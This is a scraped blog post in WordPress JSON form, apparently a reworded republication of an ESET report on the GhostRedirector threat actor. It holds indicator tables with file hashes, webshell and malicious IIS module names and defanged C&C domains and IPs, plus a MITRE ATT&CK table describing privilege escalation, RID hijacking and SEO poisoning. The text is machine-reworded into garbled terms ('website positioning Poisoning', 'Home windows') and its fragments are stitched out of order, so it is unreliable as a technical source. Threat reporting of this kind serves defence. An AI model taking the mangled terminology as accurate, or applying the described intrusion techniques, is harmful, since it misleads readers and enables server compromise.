C4681F768622BD613CBF46B218CDA06F87559825<\/span><\/td>\n N\/A<\/td>\n ASP\/Webshell.KU<\/td>\n Webshell.<\/td>\n<\/tr>\n
E69E4E5822A81F68107B933B7653C487D055C51B<\/span><\/td>\n N\/A<\/td>\n ASP\/Webshell.UZ<\/td>\n Webshell.<\/td>\n<\/tr>\n
A3A55E4C1373E8287E4E4D5D3350AC665E1411A7<\/span><\/td>\n N\/A<\/td>\n ASP\/Webshell.UY<\/td>\n Webshell.<\/td>\n<\/tr>\n
E6E4634CE5AFDA0688E73A2C21A2ECDABD5E155D<\/span><\/td>\n N\/A<\/td>\n ASP\/Webshell.UY<\/td>\n Webshell.<\/td>\n<\/tr>\n
5DFC2D0858DD7E811CD19938B8C28468BE494CB6<\/span><\/td>\n N\/A<\/td>\n ASP\/Webshell.UX<\/td>\n Webshell.<\/td>\n<\/tr>\n
08AB5CC8618FA593D2DF91900067DB464DC72B3E<\/span><\/td>\n ManagedEngine32_v2.dll<\/span><\/td>\n Win32\/BadIIS.AG<\/td>\n Gamshen, a malicious IIS module.<\/td>\n<\/tr>\n
871A4DF66A8BAC3E640B2D1C0AFC075BB3761954<\/span><\/td>\n ManagedEngine64_v2.dll<\/span><\/td>\n Win64\/BadIIS.CY<\/td>\n Gamshen, a malicious IIS module.<\/td>\n<\/tr>\n
049C343A9DAAF3A93756562ED73375082192F5A8<\/span><\/td>\n N\/A<\/td>\n MSIL\/Agent.FFZ<\/td>\n Comdai, a malicious multipurpose DLL used to create a malicious consumer.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
Community<\/h3>\n\n\n\n\n\n\n\n\n\n\n\n
IP<\/strong><\/td>\n Area<\/strong><\/td>\n Internet hosting supplier<\/strong><\/td>\n First seen<\/strong><\/td>\n Particulars<\/strong><\/td>\n<\/tr>\n<\/thead>\n
N\/A<\/td>\n xzs.868id[.]com<\/span><\/td>\n N\/A<\/td>\n 2024\u201112\u201103<\/td>\n GhostRedirector staging server, hosted on Cloudflare.<\/td>\n<\/tr>\n
104.233.192[.]1<\/span><\/td>\n xz.868id[.]com<\/span><\/td>\n PEG TECH INC<\/td>\n 2024\u201112\u201103<\/td>\n GhostRedirector staging server.<\/td>\n<\/tr>\n
104.233.210[.]229<\/span><\/td>\n q.822th[.]com<\/span>
www.881vn[.]com<\/span><\/td>\n PEG TECH INC<\/td>\n 2023\u201110\u201106<\/td>\n GhostRedirector staging server.<\/td>\n<\/tr>\n
N\/A<\/td>\n gobr.868id[.]com<\/span><\/td>\n N\/A<\/td>\n 2024\u201108\u201125<\/td>\n Gamshen C&C server, hosted on Cloudflare.<\/td>\n<\/tr>\n
N\/A<\/td>\n brproxy.868id[.]com<\/span><\/td>\n N\/A<\/td>\n 2024\u201108\u201125<\/td>\n Gamshen C&C server, hosted on Cloudflare.<\/td>\n<\/tr>\n
43.228.126[.]4<\/span><\/td>\n www.cs01[.]store<\/span><\/td>\n XIMBO Web Restricted<\/td>\n 2024\u201104\u201101<\/td>\n Comdai C&C server.<\/td>\n<\/tr>\n
103.251.112[.]11<\/span><\/td>\n N\/A<\/td>\n IRT\u2011HK\u2011ANS<\/td>\n N\/A<\/td>\n GhostRedirector staging server.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
MITRE ATT&CK methods<\/h2>\n
This desk was constructed utilizing model 17<\/a> of the MITRE ATT&CK framework.<\/p>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
Tactic<\/strong><\/td>\n ID<\/strong><\/td>\n Title<\/strong><\/td>\n Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n
Useful resource Growth<\/strong><\/td>\n T1588.002<\/a><\/td>\n Receive Capabilities: Software<\/td>\n GhostRedirector makes use of .NET Reactor<\/a> to obfuscate its instruments, and used EfsPotato and BadPotato to develop customized privilege escalation instruments.<\/td>\n<\/tr>\n
T1587.001<\/a><\/td>\n Develop Capabilities: Malware<\/td>\n GhostRedirector develops its personal malware<\/td>\n<\/tr>\n
T1608.006<\/a><\/td>\n Stage Capabilities: website positioning Poisoning<\/td>\n GhostRedirector makes use of website positioning poisoning to control search outcomes and drive site visitors to a third-party web site.<\/td>\n<\/tr>\n
T1583.001<\/a><\/td>\n Purchase Infrastructure: Domains<\/td>\n GhostRedirector makes use of malicious domains for internet hosting payloads and for its C&C servers.<\/td>\n<\/tr>\n
T1583.004<\/a><\/td>\n Purchase Infrastructure: Server<\/td>\n GhostRedirector leverages Cloudflare on its infrastructure.<\/td>\n<\/tr>\n
T1608.001<\/a><\/td>\n Stage Capabilities: Add Malware<\/td>\n GhostRedirector has staged Rungan and Gamshen on attacker-controlled servers.<\/td>\n<\/tr>\n
T1608.002<\/a><\/td>\n Stage Capabilities: Add Software<\/td>\n GhostRedirector has staged numerous malicious and legit instruments on attacker-controlled servers.<\/td>\n<\/tr>\n
T1588.003<\/a><\/td>\n Receive Capabilities: Code Signing Certificates<\/td>\n GhostRedirector obtained a certificates for signing its instruments, like these for privilege escalation.<\/td>\n<\/tr>\n
Preliminary Entry<\/strong><\/td>\n T1190<\/a><\/td>\n Exploit Public-Going through Software<\/td>\n GhostRedirector exploits an unknown SQL injection vulnerability on the sufferer\u2019s server.<\/td>\n<\/tr>\n
Execution<\/strong><\/td>\n T1106<\/a><\/td>\n Native API<\/td>\n GhostRedirector could use APIs equivalent to HttpInitialize<\/a> and HttpAddUrl<\/a> for registering a URL.<\/td>\n<\/tr>\n
T1059.001<\/a><\/td>\n Command and Scripting Interpreter: PowerShell<\/td>\n GhostRedirector makes use of PowerShell interpreter to obtain malware.<\/td>\n<\/tr>\n
T1059.003<\/a><\/td>\n Command and Scripting Interpreter: Home windows Command Shell<\/td>\n GhostRedirector can execute cmd.exe<\/span> instructions to obtain malware.<\/td>\n<\/tr>\n
T1559<\/a><\/td>\n Inter-Course of Communication<\/td>\n Comdai can create a pipe to speak and obtain info from one other course of.<\/td>\n<\/tr>\n
Persistence<\/strong><\/td>\n T1546<\/a><\/td>\n Occasion Triggered Execution<\/td>\n Gamshen is loaded by the IIS Employee Course of (w3wp.exe<\/span>) when the IIS server receives an inbound HTTP request.<\/td>\n<\/tr>\n
Privilege Escalation<\/strong><\/td>\n T1134<\/a><\/td>\n Entry Token Manipulation<\/td>\n GhostRedirector can manipulate tokens to carry out a neighborhood privilege escalation.<\/td>\n<\/tr>\n
T1112<\/a><\/td>\n Modify Registry<\/td>\n GhostRedirector can modify a Home windows registry key to carry out RID hijacking.<\/td>\n<\/tr>\n
Protection Evasion<\/strong><\/td>\n T1027<\/a><\/td>\n Obfuscated Recordsdata or Info<\/td>\n GhostRedirector obfuscates its native privilege escalation instruments utilizing .NET Reactor.<\/td>\n<\/tr>\n
T1027.009<\/a><\/td>\n Obfuscated Recordsdata or Info: Embedded Payloads<\/td>\n GhostRedirector embedded webshells into its payloads like Zunput to be dropped on compromised server.<\/td>\n<\/tr>\n
T1140<\/a><\/td>\n Deobfuscate\/Decode Recordsdata or Info<\/td>\n GhostRedirector makes use of AES in CBC mode to decrypt strings within the backdoor Rungan.<\/td>\n<\/tr>\n
Discovery<\/strong><\/td>\n T1083<\/a><\/td>\n File and Listing Discovery<\/td>\n GhostRedirector can use Zunput to record listing content material on a sufferer\u2019s server.<\/td>\n<\/tr>\n
Command and Management<\/strong><\/td>\n T1105<\/a><\/td>\n Ingress Software Switch<\/td>\n GhostRedirector can abuse the software certutil.exe<\/span> to obtain malware.<\/td>\n<\/tr>\n
T1219<\/a><\/td>\n Distant Entry Software program<\/td>\n GhostRedirector could use the GoToHTTP software for connecting remotely to victims.<\/td>\n<\/tr>\n
T1071.001<\/a><\/td>\n Software Layer Protocol: Internet Protocols<\/td>\n GhostRedirector depends on HTTP to speak with the backdoor Rungan.<\/td>\n<\/tr>\n
T1008<\/a><\/td>\n Fallback Channels<\/td>\n GhostRedirector can deploy the software GoToHTTP or create malicious customers on the compromised server to take care of entry.<\/td>\n<\/tr>\n
Influence<\/strong><\/td>\n T1565<\/a><\/td>\n Knowledge Manipulation<\/td>\n GhostRedirector can modify the response of a compromised server meant for the Google crawler, in makes an attempt to affect search outcomes order.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
$\"\"$ <\/a><\/p>\n<\/div>\n\n","protected":false},"excerpt":{"rendered":"
ESET researchers have recognized a brand new menace actor, whom now we have named GhostRedirector, that compromised a minimum of 65 Home windows servers primarily in Brazil, Thailand, and Vietnam. GhostRedirector used two beforehand undocumented, customized instruments: a passive C++ backdoor that we named Rungan, and a malicious Web Info Providers (IIS) module that we […]<\/p>\n","protected":false},"author":2,"featured_media":6347,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[58],"tags":[5168,5170,5169],"class_list":["post-6345","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybersecurity","tag-backdoors","tag-potatoes","tag-side"],"_links":{"self":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/6345","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6345"}],"version-history":[{"count":1,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/6345\/revisions"}],"predecessor-version":[{"id":6346,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/6345\/revisions\/6346"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/media\/6347"}],"wp:attachment":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6345"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6345"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6345"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

Victimology<\/h2>\nDetermine 1\u00a0reveals a heatmap of the affected nations, combining knowledge from two sources:<\/p>\n\nESET telemetry, the place we detected these assaults between December 2024 and April 2025, and<\/li>\n

The ultimate payloads<\/h2>\n

Rungan, a passive C++ backdoor<\/h3>\nRungan (SHA-1: 28140A5A29EBA098BC6215DDAC8E56EACBB29B69<\/span>) is a passive C\/C++ backdoor that now we have seen put in in C:ProgramDataMicrosoftDRMlogminiscreen.dll<\/span>.<\/p>\n